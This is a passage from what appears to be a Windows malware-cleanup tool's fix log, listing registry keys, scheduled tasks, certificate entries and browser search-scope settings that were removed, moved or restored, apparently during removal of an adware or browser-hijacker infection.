HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => could not remove, key could be protected
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => could not remove, key could be protected
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9 => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A => removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 => removed successfully
"HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Software\Microsoft\Windows\CurrentVersion\Run\\Windows" => removed successfully
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{504f5f88-f0b9-11e4-bf35-b4b52f8204d5} => removed successfully
HKLM\Software\Classes\CLSID\{504f5f88-f0b9-11e4-bf35-b4b52f8204d5} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c6bcc6da-e434-11e3-be7e-a4173142e534} => removed successfully
HKLM\Software\Classes\CLSID\{c6bcc6da-e434-11e3-be7e-a4173142e534} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e1c8640c-1171-11e4-beab-a4173142e534} => removed successfully
HKLM\Software\Classes\CLSID\{e1c8640c-1171-11e4-beab-a4173142e534} => not found
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\Machine => moved successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D8A891D-890C-4808-84D8-2F436AB14653}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D8A891D-890C-4808-84D8-2F436AB14653}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Application Experience\AitAgent" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1274336E-AB06-46B6-A48C-0671C5557CC6}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1274336E-AB06-46B6-A48C-0671C5557CC6}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\TaskScheduler\Maintenance Configurator" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1687544D-7247-4F5A-965A-A6E920E55278}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1687544D-7247-4F5A-965A-A6E920E55278}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\TaskScheduler\Manual Maintenance" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1BFF6763-5417-42C6-A8B9-23DE8C0E01B0}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1BFF6763-5417-42C6-A8B9-23DE8C0E01B0}" => removed successfully
C:\WINDOWS\System32\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\a7982934-0630-49b5-bdb1-d23d83f53ffd-6" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{40525C58-79C2-47A1-9AA2-F1D7FC4F0691}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{40525C58-79C2-47A1-9AA2-F1D7FC4F0691}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\WindowsBackup\ConfigNotification" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{51C8E8CF-5601-4895-BA14-1F91249AF735}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{51C8E8CF-5601-4895-BA14-1F91249AF735}" => removed successfully
C:\WINDOWS\System32\Tasks\BrickEnforcer-S-1910914952 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BrickEnforcer-S-1910914952" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{561B96D9-0C13-46D1-B48C-11B450EDE068}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{561B96D9-0C13-46D1-B48C-11B450EDE068}" => removed successfully
C:\WINDOWS\System32\Tasks\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{05CD7012-09EF-4D71-BB5D-4054E9B7C3DC}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6F02587F-8A2B-4552-97F6-DEEF229E335B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6F02587F-8A2B-4552-97F6-DEEF229E335B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\TaskScheduler\Idle Maintenance" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7E3BD6D3-90C4-4768-B8A8-7AB6AC090F1F}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E3BD6D3-90C4-4768-B8A8-7AB6AC090F1F}" => removed successfully
C:\WINDOWS\System32\Tasks\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{D20BA10B-ED49-4FFF-8443-5FFA687CC72A}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{87D6BD84-A209-4EE6-A6AD-3F9E410A5AFA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{87D6BD84-A209-4EE6-A6AD-3F9E410A5AFA}" => removed successfully
C:\WINDOWS\System32\Tasks\{A1783EA8-E469-4557-B18F-2087FFAF942E} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A1783EA8-E469-4557-B18F-2087FFAF942E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B7992938-01F1-4F40-A0EC-0D23D2F0F152}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B7992938-01F1-4F40-A0EC-0D23D2F0F152}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\TaskScheduler\Regular Maintenance" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BA2D6EF1-2E43-41F4-8F05-06D5FD4FE079}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA2D6EF1-2E43-41F4-8F05-06D5FD4FE079}" => removed successfully
C:\WINDOWS\System32\Tasks\{48E5C962-97D2-4C1B-8B42-380F8CFBD54D} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{48E5C962-97D2-4C1B-8B42-380F8CFBD54D}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C3753944-E90D-499B-9533-7FC6F108AC80}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C3753944-E90D-499B-9533-7FC6F108AC80}" => removed successfully
C:\WINDOWS\System32\Tasks\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C9E0EEC1-BDC8-45D5-8B41-CCC7817DD33A}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFD7C21A-808B-487B-A6EC-8A10E44E8360}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFD7C21A-808B-487B-A6EC-8A10E44E8360}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SettingSync\BackupTask" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EC594B90-2D56-4C16-A5E2-F562DBA81135}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC594B90-2D56-4C16-A5E2-F562DBA81135}" => removed successfully
C:\WINDOWS\System32\Tasks\{13B27974-850F-429D-8474-B89E6AB4248F} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{13B27974-850F-429D-8474-B89E6AB4248F}" => removed successfully
C:\WINDOWS\Tasks\a7982934-0630-49b5-bdb1-d23d83f53ffd-6.job => moved successfully
C:\WINDOWS\Tasks\BrickEnforcer-S-1910914952.job => moved successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Local Page => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{03A35688-219B-40F5-AFC8-7A437C49429D} => removed successfully
HKLM\Software\Classes\CLSID\{03A35688-219B-40F5-AFC8-7A437C49429D} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{09F1332C-51BE-4C3D-9F77-6336BC0ECF20} => removed successfully
HKLM\Software\Classes\CLSID\{09F1332C-51BE-4C3D-9F77-6336BC0ECF20} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0C2DE69F-5155-4FD6-A5F4-7EDDA54CF7C7} => removed successfully
HKLM\Software\Classes\CLSID\{0C2DE69F-5155-4FD6-A5F4-7EDDA54CF7C7} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0E29DD56-64FC-413E-8F41-5F0535696FDF} => removed successfully
HKLM\Software\Classes\CLSID\{0E29DD56-64FC-413E-8F41-5F0535696FDF} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{1109940C-95FA-4E03-A2F2-A28897FB6766} => removed successfully
HKLM\Software\Classes\CLSID\{1109940C-95FA-4E03-A2F2-A28897FB6766} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{14B5528E-A863-4962-9F60-35569D3A1D1C} => removed successfully
HKLM\Software\Classes\CLSID\{14B5528E-A863-4962-9F60-35569D3A1D1C} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{14E9506E-6D62-4741-9179-44D48CFCD8D2} => removed successfully
HKLM\Software\Classes\CLSID\{14E9506E-6D62-4741-9179-44D48CFCD8D2} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{16EF7AD8-DB44-443A-BCFB-D50A947D99BF} => removed successfully
HKLM\Software\Classes\CLSID\{16EF7AD8-DB44-443A-BCFB-D50A947D99BF} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{171CF743-D4F4-4CB1-87BC-7E191F913FC3} => removed successfully
HKLM\Software\Classes\CLSID\{171CF743-D4F4-4CB1-87BC-7E191F913FC3} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{1B8A65AA-BDF6-470E-B140-356633DFA09A} => removed successfully
HKLM\Software\Classes\CLSID\{1B8A65AA-BDF6-470E-B140-356633DFA09A} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{204DFD3C-EB06-4456-83C5-CCBF1ED48440} => removed successfully
HKLM\Software\Classes\CLSID\{204DFD3C-EB06-4456-83C5-CCBF1ED48440} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2547CEC6-613C-43E4-A593-CC2069084999} => removed successfully
HKLM\Software\Classes\CLSID\{2547CEC6-613C-43E4-A593-CC2069084999} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{25BA9130-4A0D-46EF-ADB0-73F1C655CF45} => removed successfully
HKLM\Software\Classes\CLSID\{25BA9130-4A0D-46EF-ADB0-73F1C655CF45} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{26A469EA-AA26-4747-81C6-0E1DBEEB2C13} => removed successfully
HKLM\Software\Classes\CLSID\{26A469EA-AA26-4747-81C6-0E1DBEEB2C13} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2C587672-09A4-4A45-9B9B-58A9FE436EF8} => removed successfully
HKLM\Software\Classes\CLSID\{2C587672-09A4-4A45-9B9B-58A9FE436EF8} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2C9084D8-A408-42AB-8E29-6BD020D24440} => removed successfully
HKLM\Software\Classes\CLSID\{2C9084D8-A408-42AB-8E29-6BD020D24440} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2EC50B37-C4AD-44AB-BA23-D5AAD093C41A} => removed successfully
HKLM\Software\Classes\CLSID\{2EC50B37-C4AD-44AB-BA23-D5AAD093C41A} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33A41A2E-33C2-4E13-BE84-3559916A6889} => removed successfully
HKLM\Software\Classes\CLSID\{33A41A2E-33C2-4E13-BE84-3559916A6889} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => removed successfully
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{34109212-EC73-44D1-BA1D-E129C381F861} => removed successfully
HKLM\Software\Classes\CLSID\{34109212-EC73-44D1-BA1D-E129C381F861} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3421CDC7-4296-4974-A5F7-B5684D8919B1} => removed successfully
HKLM\Software\Classes\CLSID\{3421CDC7-4296-4974-A5F7-B5684D8919B1} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{34525437-CA15-4A19-9417-26E92976BC39} => removed successfully
HKLM\Software\Classes\CLSID\{34525437-CA15-4A19-9417-26E92976BC39} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{365B2F7A-0D50-4476-B107-CB48F4658122} => removed successfully
HKLM\Software\Classes\CLSID\{365B2F7A-0D50-4476-B107-CB48F4658122} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{380E9DF0-D28C-49C4-BEC9-B7F5FC964664} => removed successfully
HKLM\Software\Classes\CLSID\{380E9DF0-D28C-49C4-BEC9-B7F5FC964664} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{43B1BB36-70BE-4F59-BCA6-F429FCF4137C} => removed successfully
HKLM\Software\Classes\CLSID\{43B1BB36-70BE-4F59-BCA6-F429FCF4137C} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{45B33A18-F60E-4AE0-9CAC-5967F87CE983} => removed successfully
HKLM\Software\Classes\CLSID\{45B33A18-F60E-4AE0-9CAC-5967F87CE983} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{45D166C3-631A-473D-8730-D0ADFD3A6F11} => removed successfully
HKLM\Software\Classes\CLSID\{45D166C3-631A-473D-8730-D0ADFD3A6F11} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{464C8606-EF57-4BE1-9060-3966C4EB5C4D} => removed successfully
HKLM\Software\Classes\CLSID\{464C8606-EF57-4BE1-9060-3966C4EB5C4D} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{4D856560-95D3-4C63-A1AA-AD9802529D26} => removed successfully
HKLM\Software\Classes\CLSID\{4D856560-95D3-4C63-A1AA-AD9802529D26} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{5949EADF-9F7D-4C65-8677-313ED03A8983} => removed successfully
HKLM\Software\Classes\CLSID\{5949EADF-9F7D-4C65-8677-313ED03A8983} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{5E7721A4-8B1A-422D-A170-9A7B384FB535} => removed successfully
HKLM\Software\Classes\CLSID\{5E7721A4-8B1A-422D-A170-9A7B384FB535} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6150EBBB-6B17-4DD1-8E8C-3FFBF198E57A} => removed successfully
HKLM\Software\Classes\CLSID\{6150EBBB-6B17-4DD1-8E8C-3FFBF198E57A} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{61DCF235-11FE-42E4-B3A5-9777503B4BA7} => removed successfully
HKLM\Software\Classes\CLSID\{61DCF235-11FE-42E4-B3A5-9777503B4BA7} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{659202E6-50F9-46C7-A428-5F75DB77AF0B} => removed successfully
HKLM\Software\Classes\CLSID\{659202E6-50F9-46C7-A428-5F75DB77AF0B} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{666C57AA-3376-458E-A26F-708CC9B1FF6D} => removed successfully
HKLM\Software\Classes\CLSID\{666C57AA-3376-458E-A26F-708CC9B1FF6D} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{69A0C7C2-B8EB-43F1-8C7D-BEDD21F3DB0E} => removed successfully
HKLM\Software\Classes\CLSID\{69A0C7C2-B8EB-43F1-8C7D-BEDD21F3DB0E} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6CA1EBCC-3860-4C12-9471-FEB4058AE6F5} => removed successfully
HKLM\Software\Classes\CLSID\{6CA1EBCC-3860-4C12-9471-FEB4058AE6F5} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6E2F5E9C-61D5-490B-BE27-DB2989EC9181} => removed successfully
HKLM\Software\Classes\CLSID\{6E2F5E9C-61D5-490B-BE27-DB2989EC9181} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{726310B3-DC05-482A-8873-5CD3627CADFC} => removed successfully
HKLM\Software\Classes\CLSID\{726310B3-DC05-482A-8873-5CD3627CADFC} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{72CDA94A-2548-4F40-B7D2-280600756A39} => removed successfully
HKLM\Software\Classes\CLSID\{72CDA94A-2548-4F40-B7D2-280600756A39} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{74934A3E-ACD6-4B9E-9C4C-C78415A9B457} => removed successfully
HKLM\Software\Classes\CLSID\{74934A3E-ACD6-4B9E-9C4C-C78415A9B457} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{873D163A-C7EE-486E-AD02-F14AB4F425EE} => removed successfully
HKLM\Software\Classes\CLSID\{873D163A-C7EE-486E-AD02-F14AB4F425EE} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{8E2BFB58-D681-41BD-A2C8-CA15440D1EBF} => removed successfully
HKLM\Software\Classes\CLSID\{8E2BFB58-D681-41BD-A2C8-CA15440D1EBF} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{8E9D7148-305D-4F6D-A505-EBFB69404960} => removed successfully
HKLM\Software\Classes\CLSID\{8E9D7148-305D-4F6D-A505-EBFB69404960} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{8EE27882-ACAA-4340-AEA5-719145283051} => removed successfully
HKLM\Software\Classes\CLSID\{8EE27882-ACAA-4340-AEA5-719145283051} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{94700D82-D8C1-42F7-959E-CAD9A16ADBAE} => removed successfully
HKLM\Software\Classes\CLSID\{94700D82-D8C1-42F7-959E-CAD9A16ADBAE} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{97CB2411-D33F-411A-9813-127915E7C4E2} => removed successfully
HKLM\Software\Classes\CLSID\{97CB2411-D33F-411A-9813-127915E7C4E2} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9A5A4683-6234-4E10-8AF3-E4FA491D4EB3} => removed successfully
HKLM\Software\Classes\CLSID\{9A5A4683-6234-4E10-8AF3-E4FA491D4EB3} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A19F8F23-6424-4131-AE98-D1DACF4876CA} => removed successfully
HKLM\Software\Classes\CLSID\{A19F8F23-6424-4131-AE98-D1DACF4876CA} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A3B40275-870B-498B-BD19-B5702E8B61A2} => removed successfully
HKLM\Software\Classes\CLSID\{A3B40275-870B-498B-BD19-B5702E8B61A2} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A810E43A-313B-4571-8D1D-6DEC89C6B1D7} => removed successfully
HKLM\Software\Classes\CLSID\{A810E43A-313B-4571-8D1D-6DEC89C6B1D7} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A9689D8D-DD63-4900-BD1D-9E6F8E7D26DF} => removed successfully
HKLM\Software\Classes\CLSID\{A9689D8D-DD63-4900-BD1D-9E6F8E7D26DF} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A9AFD5C7-DB69-4A9D-BF1A-8B33473351A4} => removed successfully
HKLM\Software\Classes\CLSID\{A9AFD5C7-DB69-4A9D-BF1A-8B33473351A4} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AB73B2ED-F705-4656-9490-B2C6B2AEB6C6} => removed successfully
HKLM\Software\Classes\CLSID\{AB73B2ED-F705-4656-9490-B2C6B2AEB6C6} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AEBA8DD8-21D0-4DB6-A4F2-B4C5569260CA} => removed successfully
HKLM\Software\Classes\CLSID\{AEBA8DD8-21D0-4DB6-A4F2-B4C5569260CA} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFD30DD4-F70E-4D36-BD50-FB5DA3AAEECF} => removed successfully
HKLM\Software\Classes\CLSID\{AFD30DD4-F70E-4D36-BD50-FB5DA3AAEECF} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B37AD013-C2D0-40F3-97D9-0472349E9C44} => removed successfully
HKLM\Software\Classes\CLSID\{B37AD013-C2D0-40F3-97D9-0472349E9C44} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B3D3A37C-4613-432E-8E3A-53E589157C4D} => removed successfully
HKLM\Software\Classes\CLSID\{B3D3A37C-4613-432E-8E3A-53E589157C4D} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B6CA1B24-2418-4737-BB1A-6AB0CC0DF5AC} => removed successfully
HKLM\Software\Classes\CLSID\{B6CA1B24-2418-4737-BB1A-6AB0CC0DF5AC} => not found
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B71E823F-B4CC-4FB0-A8CC-DC505018DC1E} => removed successfully
HKLM\Software\Classes\CLSID\{B71E823F-B4CC-4FB0-A8CC-DC505018DC1E} => not found
